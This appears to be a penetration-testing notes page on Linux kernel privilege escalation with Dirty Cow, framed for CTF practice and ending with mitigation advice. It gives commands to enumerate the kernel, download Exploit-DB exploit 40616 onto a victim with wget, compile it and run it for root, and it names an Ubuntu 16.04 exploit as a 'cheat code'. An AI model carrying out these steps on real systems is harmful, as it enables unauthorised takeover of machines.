Kernel Exploits

Dirty Cow!

Enumeration

Enumerate kernel version and google it:

uname -a

Or, transfer linux-exploit-suggester.sh to the victim machine and run it. If the keyword "dirtycow" is in the output, try it.

Dirty Cow

Dirty Cow

Dirty Cow is the most commonly used kernel exploit in CTF-like. The downside is that a failed Dirty Cow attack may crash the victim machine. This will be really bad in a real-world pentest scenario.

Quote from the original bug report:

A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged, local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.

Suppose we want to use exploit 40616 from Exploit-DB. On the victim machine, change to the /tmp directory:

cd /tmp

download it:

wget https://www.exploit-db.com/download/40616 -O cowroot.c

Following the instruction, uncomment a payload, and compile it:

gcc cowroot.c -o cowroot -pthread

Execute the exploit:

./cowroot

Make the shell more stable:

echo 0 > /proc/sys/vm/dirty_writeback_centisecs

Cheat Code: Ubuntu 16.04 Privesc

Many Linux machines are vulnerable to this kernel exploit, so I call it the "cheat code" in Linux privilege escalation.

This kernel exploit works smoothly for many boxes:

Ubuntu 16.04 local privesc

Mitigation

A successful privilege escalation through kernel exploits require the following 5 conditions:

  1. A vulnerable kernel

  2. A working exploit

  3. A way to transfer the exploit to the target

  4. A way to compile the exploit (optional since some exploits can be compiled on the attack machine)

  5. A way to execute the exploit

Condition 1 and 2 are hard to prevent, hence we should focus on condition 3, 4, and 5. The mitigation ideas are:

  • Prevent transferring the exploit

    • Do not allow users to use FTP, TFTP, SMB, SCP, wget, and curl

  • Remove compilation tools

    • Remove GCC, CC, and other development tools.

  • Prevent exploit execution

    • Mount directories such as /tmp and /home on a separete non-executable file system.

    • For existing executables, set chmod 700 <executable> if you don't want the user to execute it.

Last updated

Was this helpful?